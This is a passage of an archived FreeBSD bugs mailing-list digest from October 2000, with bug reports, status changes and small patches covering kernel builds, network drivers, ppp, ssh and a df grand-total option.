kernel failed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: make kernel failed State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Tue Oct 31 09:46:25 PST 2000 State-Changed-Why: Since both LINT and GENERIC build fine according to http://current.jp.FreeBSD.org/build/i386/ I belive this is poblem is due to cvsup between comitts. Please try a new check out of the src (get the latest cmts). Also try to use the buildkernel target in /usr/src which is the prefered way to build kernels. Since current is changing so fast, in the future please report build problem of 5-current to freebsd-current@freebsd.org Thanks http://www.freebsd.org/cgi/query-pr.cgi?pr=22072 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 10:42: 3 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id A474337B4C5; Tue, 31 Oct 2000 10:42:00 -0800 (PST) Received: by gatekeeper.veriohosting.com; Tue, 31 Oct 2000 11:42:00 -0700 (MST) Received: from unknown(192.168.1.110) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma009883; Tue, 31 Oct 00 11:41:47 -0700 Received: by guppy.orem.iserver.com; Tue, 31 Oct 2000 11:41:02 -0700 (MST) To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22443: asr driver can't do dumps References: <200010311710.JAA96033@freefall.freebsd.org> From: Jamie Gritton Date: 31 Oct 2000 11:41:02 -0700 In-Reply-To: gnats-admin@FreeBSD.org's message of "Tue, 31 Oct 2000 09:10:01 -0800 (PST)" Message-ID: Lines: 8 X-Mailer: Gnus v5.5/Emacs 20.3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Thank you very much for your problem report. > It has the internal identification `kern/22443'. Is it possible to withdraw this report. I just found out the feture I thought wasn't there really is. - James Gritton gritton@iserver.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 11:13:13 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5025A37B479; Tue, 31 Oct 2000 11:13:12 -0800 (PST) Received: (from bmah@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA44872; Tue, 31 Oct 2000 11:13:12 -0800 (PST) (envelope-from bmah@FreeBSD.org) Date: Tue, 31 Oct 2000 11:13:12 -0800 (PST) From: Message-Id: <200010311913.LAA44872@freefall.freebsd.org> To: gritton@iserver.com, bmah@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22443: asr driver can't do dumps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: asr driver can't do dumps State-Changed-From-To: open->closed State-Changed-By: bmah State-Changed-When: Tue Oct 31 11:12:36 PST 2000 State-Changed-Why: Closed by the request of submitter. http://www.freebsd.org/cgi/query-pr.cgi?pr=22443 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 12:50: 9 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CC72137B4E5 for ; Tue, 31 Oct 2000 12:50:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA82900; Tue, 31 Oct 2000 12:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BC18F37B479; Tue, 31 Oct 2000 12:41:07 -0800 (PST) Message-Id: <20001031204107.BC18F37B479@hub.freebsd.org> Date: Tue, 31 Oct 2000 12:41:07 -0800 (PST) From: paul.magwene@yale.edu To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22454: `dc' device support broken in -STABLE branch Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22454 >Category: kern >Synopsis: `dc' device support broken in -STABLE branch >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 12:50:03 PST 2000 >Closed-Date: >Last-Modified: >Originator: Paul Magwene >Release: 4.X-STABLE >Organization: >Environment: From dmesg (had to boot into previous kernel to use networking) FreeBSD 4.2-BETA #25: Tue Oct 31 14:41:23 EST 2000 pmagwene@sluggo:/usr/src/sys/compile/SLUGGO >Description: The 'dc' driver appears to have become broken in the -STABLE branch sometime in the last week or so. From dmesg on offending kernel... FreeBSD 4.2-BETA #25: Tue Oct 31 14:41:23 EST 2000 pmagwene@sluggo:/usr/src/sys/compile/SLUGGO << SNIP >> dc0: <82c169 PNIC 10/100BaseTX> irq 17 at device 16.0 on pci0 dc0: couldn't map ports/memory device_probe_and_attach: dc0 attach returned 6 Compared to dmesg on previous working kernel: FreeBSD 4.1.1-STABLE #24: Mon Oct 23 16:54:39 EDT 2000 pmagwene@sluggo:/usr/src/sys/compile/SLUGGO << SNIP >> dc0: <82c169 PNIC 10/100BaseTX> port 0xb000-0xb0ff mem 0xfedfd800-0xfedfd8ff irq 17 at device 16.0 on pci0 dc0: Ethernet address: 00:c0:f0:59:04:f3 miibus0: on dc0 ukphy0: on miibus0 ukphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto lnc0: port 0xbcc0-0xbcdf mem 0xfedfdc00-0xfedfdc1f >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 13:10:11 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 690E237B479 for ; Tue, 31 Oct 2000 13:10:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA92290; Tue, 31 Oct 2000 13:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 31 Oct 2000 13:10:03 -0800 (PST) Message-Id: <200010312110.NAA92290@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Greenman Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Reply-To: David Greenman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/22441; it has been noted by GNATS. From: David Greenman To: William J Carpenter Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/22441: pmap_growkernel() is not effective at kernel vm limit of 0xffc00000 Date: Tue, 31 Oct 2000 13:03:29 -0800 >I am not sure that what I am doing is strictly necessary, but >I can successfully allocate kernel vm this way in BSDI. > > but I > should point out that the alternate page table map (APTmap) starts > at 0xffc00000, so I don't see how you could ever use that area of > virtual memory without serious problems. What am I missing? > >That's good to know. > >The problem is that 0xffc00000 is passed as a limit to pmap_growkernel(). >I am not using 0xffc00000, I am using memory up to 0xffc00000 which >is the advertised limit to kernel vm. (kernel_map->header.end) > >(kgdb) print /x * kernel_map >$221 = {header = {prev = 0xc02c1d60, next = 0xc02c1f70, start = 0xbfeff000, > end = 0xffc00000, avail_ssize = 0x0, object = {vm_object = 0x0, > sub_map = 0x0}, offset = 0x0, eflags = 0x0, protection = 0x0, > max_protection = 0x0, inheritance = 0x0, wired_count = 0x0, lastr = 0x0}, > lock = {lk_interlock = {lock_data = 0x0}, lk_flags = 0x1000000, > lk_sharecount = 0x0, lk_waitcount = 0x0, lk_exclusivecount = 0x0, > lk_prio = 0x4, lk_wmesg = 0xc0277da0, lk_timo = 0x0, > lk_lockholder = 0xffffffff}, nentries = 0x9, size = 0x1e531000, > system_map = 0x1, hint = 0xc02c1d60, timestamp = 0x21, > first_free = 0xc02c1d00, pmap = 0xc02cf8c0} > >Pmap_growkernel()'s job is to set-up the physical page mappings to >cover the increased kernel vm. In order to do this on the i386 >architecture, a page map directory entry must be made for every >4mbytes of memory. The kernel vm layer rounds vm up to a page >boundary. The physical map layer must round-up a 4mbyte boundary >because of the two level i386 page mapping hierarchy. > >If the vm layer kernel memory limit falls on a page boundary, >but not on a page directory boundary, say 0xffb01000, >then as far as physical map layer is concerned, a page directory >entry must be created to cover vm from 0xffb00000 to 0xffbfffff. >If the vm layer limit falls on 0xffb00000, this means that >the kernel requested vm in the range 0xffaff000 to 0xffafffff. >The vm layer rounds this address up to 0xffb00000 and declares >that this is the limit for pmap_growkernel(). In the case where >the limit is 0xffb00000, pmap_growkernel actually makes a >page directory entry for adresses >= 0xffb00000 -- a harmless >sort of overflow which merely sucks up an extra page of memory. >In the case where the kernel vm grows to the range of >[ 0xffbff001, 0xffc00000-1 ], (the page below 0xffc00000, in this >case, kernel vm requested explicitly by me), pmap_growkernel() >overflows by rounding 0xffc0000 up to the next 4m boundary which >on 32-bit machines is 0. > >I hope this helps explain what I think is a problem. Your analysis appears to be correct, and using roundup() seems like a fine solution. All three rounding expressions in that function need to be changed to completely fix the problem. Thanks for the bug report! -DG David Greenman Co-founder, The FreeBSD Project - http://www.freebsd.org President, TeraSolutions, Inc. - http://www.terasolutions.com Pave the road of life with opportunities. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 14:40: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2D7E37B4D7 for ; Tue, 31 Oct 2000 14:40:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA25949; Tue, 31 Oct 2000 14:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DA37937B4D7; Tue, 31 Oct 2000 14:36:36 -0800 (PST) Message-Id: <20001031223636.DA37937B4D7@hub.freebsd.org> Date: Tue, 31 Oct 2000 14:36:36 -0800 (PST) From: jschoch@siscom.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/22456: kde installs but incorrectly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22456 >Category: i386 >Synopsis: kde installs but incorrectly >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 14:40:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: James D. Schoch >Release: 4.1 >Organization: >Environment: gigabyte mother board (GA-5AX),AMDK-6 233 cpu, viper 330 video card >Description: KDE is installing improperly. GUI does not come up with "startkde". v4.0 installed reasonably well on the same machine. A partial KDE GUI comes up with "startx". Just wanted to know if this is a known bug that will be fixed in v4.2 possibly using KDE 2.0. Defaults used for installation. This may be listed on your cite but after a couple of hours of looking I gave up. Jim Schoch >How-To-Repeat: Use the same default installation. >Fix: I can wait until v4.2 comes out! >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 15: 5:22 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30BDE37B4C5; Tue, 31 Oct 2000 15:05:21 -0800 (PST) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA38675; Tue, 31 Oct 2000 15:05:21 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Tue, 31 Oct 2000 15:05:21 -0800 (PST) From: Message-Id: <200010312305.PAA38675@freefall.freebsd.org> To: robmel@innotts.co.uk, robmel@nadt.org.uk, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/22238: User PPP "deny_incoming" option does not deny incoming connections Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: User PPP "deny_incoming" option does not deny incoming connections State-Changed-From-To: open->closed State-Changed-By: brian State-Changed-When: Tue Oct 31 15:03:27 PST 2000 State-Changed-Why: With ``nat deny_incoming'', ppp now drops incoming connections (as well as IP packets unrecognised by libalias !) in -current, RELENG_4 and RELENG_3. http://www.freebsd.org/cgi/query-pr.cgi?pr=22238 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 16: 2:25 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4396037B687; Tue, 31 Oct 2000 16:02:23 -0800 (PST) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA59896; Tue, 31 Oct 2000 16:02:23 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Tue, 31 Oct 2000 16:02:23 -0800 (PST) From: Message-Id: <200011010002.QAA59896@freefall.freebsd.org> To: Stanley.Hopcroft@IPAustralia.GOv.AU, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22234: When using tun interface (user PPP), tcpdump does not show incoming packets when used with a filter expression Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: When using tun interface (user PPP), tcpdump does not show incoming packets when used with a filter expression State-Changed-From-To: open->closed State-Changed-By: brian State-Changed-When: Tue Oct 31 15:56:53 PST 2000 State-Changed-Why: Fixed in -current, and just commited to -stable (net/if_tun.c 1.74.2.2) http://www.freebsd.org/cgi/query-pr.cgi?pr=22234 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 16:12: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 75D6F37B4C5; Tue, 31 Oct 2000 16:12:06 -0800 (PST) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA65253; Tue, 31 Oct 2000 16:12:06 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Tue, 31 Oct 2000 16:12:06 -0800 (PST) From: Message-Id: <200011010012.QAA65253@freefall.freebsd.org> To: brian@FreeBSD.org, freebsd-bugs@FreeBSD.org, kris@FreeBSD.org Subject: Re: bin/22307: ssh dumps core if fields in password entry are empty Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ssh dumps core if fields in password entry are empty Responsible-Changed-From-To: freebsd-bugs->kris Responsible-Changed-By: brian Responsible-Changed-When: Tue Oct 31 16:08:25 PST 2000 Responsible-Changed-Why: I submitted a patch to kris a while ago for this.... http://www.freebsd.org/cgi/query-pr.cgi?pr=22307 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 16:21:34 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1EF6D37B4CF; Tue, 31 Oct 2000 16:21:33 -0800 (PST) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA69499; Tue, 31 Oct 2000 16:21:33 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Tue, 31 Oct 2000 16:21:33 -0800 (PST) From: Message-Id: <200011010021.QAA69499@freefall.freebsd.org> To: venglin@freebsd.lublin.pl, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/22319: Malicious remote user can cause ppp(8) to segfault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Malicious remote user can cause ppp(8) to segfault State-Changed-From-To: open->closed State-Changed-By: brian State-Changed-When: Tue Oct 31 16:19:38 PST 2000 State-Changed-Why: I've just merged a fix for this (making fd_sets dynamic). Note: there are still DOS attacks possible in this respect. There's no substitute for a well-configured firewall. http://www.freebsd.org/cgi/query-pr.cgi?pr=22319 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 17:11:12 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4CF2837B4C5; Tue, 31 Oct 2000 17:11:10 -0800 (PST) Received: by gw.nectar.com (Postfix, from userid 1001) id AD67F192A7; Tue, 31 Oct 2000 19:11:08 -0600 (CST) Date: Tue, 31 Oct 2000 19:11:08 -0600 From: "Jacques A. Vidrine" To: brian@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org, kris@FreeBSD.org Subject: Re: bin/22307: ssh dumps core if fields in password entry are empty Message-ID: <20001031191108.C5333@spawn.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , brian@FreeBSD.org, freebsd-bugs@FreeBSD.org, kris@FreeBSD.org References: <200011010012.QAA65253@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200011010012.QAA65253@freefall.freebsd.org>; from brian@FreeBSD.org on Tue, Oct 31, 2000 at 04:12:06PM -0800 X-Url: http://www.nectar.com/ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 31, 2000 at 04:12:06PM -0800, brian@FreeBSD.org wrote: > Synopsis: ssh dumps core if fields in password entry are empty > > Responsible-Changed-From-To: freebsd-bugs->kris > Responsible-Changed-By: brian > Responsible-Changed-When: Tue Oct 31 16:08:25 PST 2000 > Responsible-Changed-Why: > I submitted a patch to kris a while ago for this.... > > http://www.freebsd.org/cgi/query-pr.cgi?pr=22307 I think I fixed this with rev. 1.56 of src/lib/libc/gen/getpwent.c. Though applications should check if pointers are NULL before dereferencing, it appears that many do not when it comes to getpw* results. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 17:26:32 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 2BC7937B4D7; Tue, 31 Oct 2000 17:26:23 -0800 (PST) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id eA11Lel92449; Wed, 1 Nov 2000 01:21:40 GMT (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.1) with ESMTP id eA11LRs66500; Wed, 1 Nov 2000 01:21:27 GMT (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200011010121.eA11LRs66500@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: "Jacques A. Vidrine" Cc: brian@FreeBSD.org, freebsd-bugs@FreeBSD.org, kris@FreeBSD.org, brian@Awfulhak.org Subject: Re: bin/22307: ssh dumps core if fields in password entry are empty In-Reply-To: Message from "Jacques A. Vidrine" of "Tue, 31 Oct 2000 19:11:08 CST." <20001031191108.C5333@spawn.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 01 Nov 2000 01:21:27 +0000 From: Brian Somers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Tue, Oct 31, 2000 at 04:12:06PM -0800, brian@FreeBSD.org wrote: > > Synopsis: ssh dumps core if fields in password entry are empty > > > > Responsible-Changed-From-To: freebsd-bugs->kris > > Responsible-Changed-By: brian > > Responsible-Changed-When: Tue Oct 31 16:08:25 PST 2000 > > Responsible-Changed-Why: > > I submitted a patch to kris a while ago for this.... > > > > http://www.freebsd.org/cgi/query-pr.cgi?pr=22307 > > I think I fixed this with rev. 1.56 of src/lib/libc/gen/getpwent.c. > > Though applications should check if pointers are NULL before > dereferencing, it appears that many do not when it comes to getpw* > results. Yep, that fixes the core-dump - thanks. The only thing that remains to be fixed is the memory leak... :-) Kris, will you do the honours (am I allowed change the PR subject and bug ???!?!). Something like this should do: Index: ssh.c =================================================================== RCS file: /home/ncvs/src/crypto/openssh/ssh.c,v retrieving revision 1.10 diff -u -r1.10 ssh.c --- ssh.c 2000/09/10 09:35:38 1.10 +++ ssh.c 2000/11/01 01:19:35 @@ -513,7 +513,6 @@ pwcopy.pw_passwd = xstrdup(pw->pw_passwd); pwcopy.pw_uid = pw->pw_uid; pwcopy.pw_gid = pw->pw_gid; - pwcopy.pw_class = xstrdup(pw->pw_class); pwcopy.pw_dir = xstrdup(pw->pw_dir); pwcopy.pw_shell = xstrdup(pw->pw_shell); pwcopy.pw_class = xstrdup(pw->pw_class); > -- > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org Cheers. -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 17:30: 8 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B669C37B4D7 for ; Tue, 31 Oct 2000 17:30:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA36726; Tue, 31 Oct 2000 17:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mailman.packetdesign.com (dns.PACKETDESIGN.NET [216.15.46.10]) by hub.freebsd.org (Postfix) with ESMTP id 2D87F37B4D7 for ; Tue, 31 Oct 2000 17:20:46 -0800 (PST) Received: from bubba.packetdesign.com (bubba.packetdesign.com [192.168.0.223]) by mailman.packetdesign.com (8.11.0/8.11.0) with ESMTP id eA11KhQ90962 for ; Tue, 31 Oct 2000 17:20:43 -0800 (PST) (envelope-from archie@packetdesign.com) Received: (from archie@localhost) by bubba.packetdesign.com (8.11.1/8.11.1) id eA11Ki008714; Tue, 31 Oct 2000 17:20:44 -0800 (PST) (envelope-from archie) Message-Id: <200011010120.eA11Ki008714@bubba.packetdesign.com> Date: Tue, 31 Oct 2000 17:20:44 -0800 (PST) From: Archie Cobbs Reply-To: archie@packetdesign.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/22460: PCMCIA card using ed driver temporarily freezes system Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22460 >Category: kern >Synopsis: PCMCIA card using ed driver temporarily freezes system >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 17:30:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Archie Cobbs >Release: FreeBSD 4.1.1-STABLE i386 >Organization: Packet Design, Inc. >Environment: FreeBSD 4.1.1-RELEASE PMX PE-200 PCMCIA Ethernet card, uses the "ed" driver >Description: This problem was originally reported on freebsd-mobile. The email below describes the situation. The patch suggested does in fact fix the problem. > From owner-freebsd-mobile Mon Oct 30 4:27:55 2000 > Delivered-To: freebsd-mobile@freebsd.org > Received: from lavender.sanpei.org (ppp153.dialup.st.keio.ac.jp [131.113.27.153]) > by hub.freebsd.org (Postfix) with ESMTP id F033E37B4C5 > for ; Mon, 30 Oct 2000 04:27:48 -0800 (PST) > Received: (from sanpei@localhost) > by lavender.sanpei.org (8.11.0/3.7W) id e9UCRIb08030; > Mon, 30 Oct 2000 21:27:18 +0900 (JST) > Date: Mon, 30 Oct 2000 21:27:18 +0900 (JST) > Message-Id: <200010301227.e9UCRIb08030@lavender.sanpei.org> > To: archie@dellroad.org > Cc: freebsd-mobile@FreeBSD.ORG > Subject: Re: PCMCIA card temporarily freezes system > In-Reply-To: Your message of "Sat, 28 Oct 2000 11:52:10 -0700 (PDT)". > <200010281852.e9SIqAO34152@curve.dellroad.org> > From: sanpei@sanpei.org (MIHIRA Yoshiro) > X-Mailer: mnews [version 1.22] 1999-12/19(Sun) > Sender: owner-freebsd-mobile@FreeBSD.ORG > Precedence: bulk > X-Loop: FreeBSD.org > > archie@dellroad.org wrote: > > >> I have this PCMCIA card: PMX PE-200, which uses the "ed" driver. > >> It has worked for me before on another system, but in trying > >> on a ThinkPad A20m laptop with FreeBSD 4.1.1-REL, it seems > >> to temporarily "freeze" the system when plugged in. > >> > >> That is, if pccardd is not running, everything looks normal. > >> When pccardd is started, it detects the card and the kernel > >> spits out the probe message with the IRQ and memory address, > >> and then the system completely freezes: > >> > >> pccard: card inserted, slot 0 > >> ed0 at port 0x300-0x31f iomem 0xd4000-0xd43ff irq 10 slot 0 on pccard0 > >> > >> Pressing keys on the keyboard does nothing. But then if I pop out > >> the card, the system continues normally (responding to any keys > >> pressed while frozen), printing out the card's Ethernet address, > >> etc. Of course then pccard immediately detects the card has been > >> popped out and detaches the interface: > >> > >> ed0: address 00:20:e0:0f:a6:9f, type NE2000 (16 bit) > >> ed0: detached > >> pccard: card removed, slot 0 > >> stray irq 10 > >> > >> This can be repeeated any number of times. > >> > >> Any ideas? I've tried different interrupts, etc., to no avail. > >> This card works fine under Win98 on the same laptop. Dmesg > >> excerpts below.. > > Try below quick hack patch. > Some PC-Card which uses "ed" driver have hung-up with ed_get_linksys. > But we don't solve this problem.... > > Cheers > MIHIRA Yoshiro > > --- sys/dev/ed/if_ed_pccard.c.org Mon Oct 30 21:24:34 2000 > +++ sys/dev/ed/if_ed_pccard.c Mon Oct 30 21:24:48 2000 > @@ -201,13 +201,17 @@ > return (error); > } > > +#if 0 > if (ed_get_Linksys(sc) == 0) { > +#endif > pccard_get_ether(dev, ether_addr); > for (i = 0, sum = 0; i < ETHER_ADDR_LEN; i++) > sum |= ether_addr[i]; > if (sum) > bcopy(ether_addr, sc->arpcom.ac_enaddr, ETHER_ADDR_LEN); > +#if 0 > } > +#endif > > error = ed_attach(sc, device_get_unit(dev), flags); > return (error); >How-To-Repeat: See above. >Fix: Apply the patch shown above. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 18:20:11 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 87FBD37B479 for ; Tue, 31 Oct 2000 18:20:06 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA61460; Tue, 31 Oct 2000 18:20:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 31 Oct 2000 18:20:06 -0800 (PST) Message-Id: <200011010220.SAA61460@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cyrille Lefevre Subject: Re: bin/19635: add -c for grand total to df(1), like du(1) does Reply-To: Cyrille Lefevre Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/19635; it has been noted by GNATS. From: Cyrille Lefevre To: freebsd-gnats-submit@FreeBSD.org Cc: will@FreeBSD.org Subject: Re: bin/19635: add -c for grand total to df(1), like du(1) does Date: Wed, 1 Nov 2000 03:13:14 +0100 (CET) Hi Will, I've found a -current machine where I could reproduce "the bug". in fact, I didn't have this bug, because I compile w/ -funroll-loops ! so, I fix the addstat() function to bypass the long overflow using an intermediate variable as double in case of DEV_BSIZE > 512 (who knows :). here is a complete patch to df(1) w/ -c for grand total which seems to work whatever the system version and compiler options. ----------==========---------- cut here ----------==========---------- Index: df.1 =================================================================== RCS file: /home/ncvs/src/bin/df/df.1,v retrieving revision 1.18.2.2 diff -u -r1.18.2.2 df.1 --- df.1 2000/07/01 03:02:08 1.18.2.2 +++ df.1 2000/07/02 05:38:45 @@ -44,7 +44,7 @@ .Fl b | h | H | k | .Fl m | P .Oc -.Op Fl ain +.Op Fl acin .Op Fl t Ar type .Op Ar file | Ar filesystem ... .Sh DESCRIPTION @@ -71,6 +71,8 @@ this overrides the .Ev BLOCKSIZE specification from the environment. +.It Fl c +Display a grand total. .It Fl g Use 1073741824-byte (1-Gbyte) blocks rather than the default. Note that this overrides the Index: df.c =================================================================== RCS file: /home/ncvs/src/bin/df/df.c,v retrieving revision 1.23.2.1 diff -u -r1.23.2.1 df.c --- df.c 2000/06/13 03:19:40 1.23.2.1 +++ df.c 2000/11/01 01:46:27 @@ -103,11 +103,12 @@ void prthuman __P((struct statfs *, long)); void prthumanval __P((double)); void prtstat __P((struct statfs *, int)); +void addstat __P((struct statfs *, struct statfs *)); int ufs_df __P((char *, int)); unit_t unit_adjust __P((double *)); void usage __P((void)); -int aflag = 0, 